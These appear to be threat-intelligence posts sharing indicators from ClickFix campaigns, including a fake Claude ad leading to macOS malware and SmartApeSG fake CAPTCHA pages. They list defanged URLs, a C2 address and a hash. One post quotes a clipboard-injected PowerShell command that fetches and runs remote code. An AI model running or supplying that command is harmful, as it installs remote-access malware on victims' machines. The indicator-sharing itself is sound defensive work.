2026-04-22: Malicious ad (#Malvertizing) for Claude leads to #ClickFix style page for #macOS #malwareDetails at https://www.malware-traffic-analysis.net/2026/04/22/index.htmlI've seen a bit about this activity from other sources, but this is the infection I generated in my lab and finally got around to posting.
2026-04-27 (Monday): Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:- hxxps[:]//datanexlab[.]top/trace/audit-module.js- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)Traffic leading to #RAT payload:- hxxp[:]//216.120.201[].116/- hxxp[:]//104.225.129[.]105/- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365#RAT payload C2 traffic:- tcp[:]//89.110.110[.]119:443/
After working on it a bit, we have a fix for a recent #ClickFix attack against #macOS that leverages AppleScript. Here's the writeup, and a link to the forum thread!https://ifin-intel.org/blog/applescript/#ThreatIntel ThreatIntelligence #IFIN
@BrandonD i don't really know what their criteria is for the gateway url with the /g path. they do seem to toggle it off for periods of time. i speculate they only have it enabled during victim business hours and when they're on the clock, so to speak.
